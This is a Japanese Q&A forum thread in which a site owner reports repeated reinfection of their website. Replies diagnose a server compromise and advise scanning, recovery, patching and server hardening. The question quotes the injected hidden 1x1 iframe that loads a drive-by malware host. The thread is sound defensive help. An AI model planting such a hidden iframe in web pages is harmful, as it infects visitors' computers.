- ベストアンサー
サイトが何度も感染
数日前に自分のサイトがウイルスに感染しました。 サーバからデータを全消去・パソコンを再インストール後、サイトを再アップロード。 そのバックアップは感染の半月以上前にメディアに取ってあった物で、アップロード前にはカスペルスキーでファイルをスキャンしてみましたが何も出ず。 が、数時間後にサイトにアクセスするとまた感染を検出されます。 感染したサイトのインデックスファイルは、毎回bodyタグの後に↓のようなタグが勝手に書き加えられているのですが… <iframe src='http://quickcnt.com/ld/axhst/' width='1' height='1' style='visibility: hidden;'></iframe> 本当は全部半角です。 サイトのデータがファイルスキャンで引っ掛からない何かに感染しているのでしょうか。それとも、他に何か原因があるのでしょうか?
- walnuts
- お礼率66% (2/3)
- ウィルス・マルウェア
- 回答数3
- ありがとう数2
- みんなの回答 (3)
- 専門家の回答
質問者が選んだベストアンサー
1.「iframe」が使われている。 ><iframe src= 2.ホームページに見えないリンクが埋め込まれている。 >width='1' height='1' style='visibility: hidden;' 以上の症状から、不正アクセスによりあなたのホームページが書き換えられていると思われます。 今年1月~2月にかけてこの種の事件が頻発しました。 http://itpro.nikkeibp.co.jp/article/NEWS/20070205/260645/ スーパーボウル開催地ドルフィン・スタジアムの公式Webサイトがマルウエアに感染,Websenseが警告:ITpro http://pc.nikkeibp.co.jp/article/NEWS/20070205/260652/?ST=pc_news スーパーボウル会場の公式サイトが改ざん、ウイルスコードを埋め込まれる:日経パソコンオンライン http://internet.watch.impress.co.jp/cda/news/2007/02/06/14697.html スーパーボウル会場のサイトに「MS06-014」「MS07-004」を突くコード http://www.itmedia.co.jp/enterprise/articles/0702/06/news022.html ITmedia エンタープライズ:スーパーボウル会場以外にも……多数のハッキング被害判明 http://www.itmedia.co.jp/enterprise/articles/0702/08/news027.html ITmedia エンタープライズ:スーパーボウル・ハッキングの攻撃経路判明 IEの脆弱性をつき、ホームページへアクセスしただけで、上記のリンク先(quickcnt.com)へアクセスして有害なプログラムをインストールさせようとするものです。 Windowsアップデートが最新の状態であればこの脆弱性は修復されていて、不正なリンク先へのアクセスは発生しないと思います。 もし、質問者さんが自前のサーバーを立ち上げておられるのであれば、そのサーバーはハッカーの標的にされているようですから、修復してもすぐまた不正なコードを書き込まれてしまうのではないでしょうか。 これに対し十分な対策を立てられないのであれば、そのサーバーは直ちに閉鎖すべきだと思います。 もし、いずれかのプロバイダーを使っておられるのであればプロバイダーに依頼して対策を立ててもらう必要があると思います。
その他の回答 (2)
- 123admin
- ベストアンサー率52% (1165/2221)
手持ちの全てのPCの徹底的なスキャンを推奨します。 なんらかのマルウェアに感染している可能性が非常に濃厚です。 レンタルサーバー側の問題と言うよりも、手持ちのPCが感染している確率が高いと思います。 質問の中のURLは既に活動を停止しているようですが、Googleでは感染サイトとして登録されています。 自分のサイトは一時閉鎖して、PCの感染が見つからない場合には全てPCのリカバリを行ってください。 カスペルスキーは検出力が高いとは言え絶対ではありません。 例えばサーバ用のツールなどに付随した実行型の悪意あるソフトがあった場合には検出は困難です。 現実問題、自分のサイトが感染している事を重く受け止めてください。 リカバリに関しては下記を参考にして下さい。 リカバリ基本編 http://iwata.way-nifty.com/home/2004/10/1017.html リカバリ応用編 http://iwata.way-nifty.com/home/2005/05/0530.html
補足
回答ありがとうございます。 ですが、この質問は、徹底的なスキャンもサイトの閉鎖もリカバリも全部やった後の話なんです。
然るに。 数時間で侵される場合、セキュリティ設定が弱すぎるのだと 思います。 何のOSのサーバか存じませんが、HTMLが書き換えられたり、 URLの振り先が変更されるというのはよろしくありません。 ためしに、パスワード等を難解なものにするとともに、 不要なポートは開けない、権限設定をきっちりする、 セキュリティパッチを充てるなど防御を高める必要があります。 防御を高めると、ポートスキャン程度の被害しか受けませんよ。
お礼
ご回答ありがとうございます。 セキュリティの設定を見直してみます。 サーバレンタル元(ロリポップなのですが)のサポートセンターからは「当方が原因ではありません」というような内容の返事しか返って来なかったので… 本当にありがとうございました。
お礼
回答ありがとうございます。 何が起きていたのか漸く判りました。 再インストール(というかリカバリ)してからMEだったのもいけなかったんでしょうかね。 すぐにXPにアップデートしてWindowsアップデートもするようにします。 本当にありがとうございました。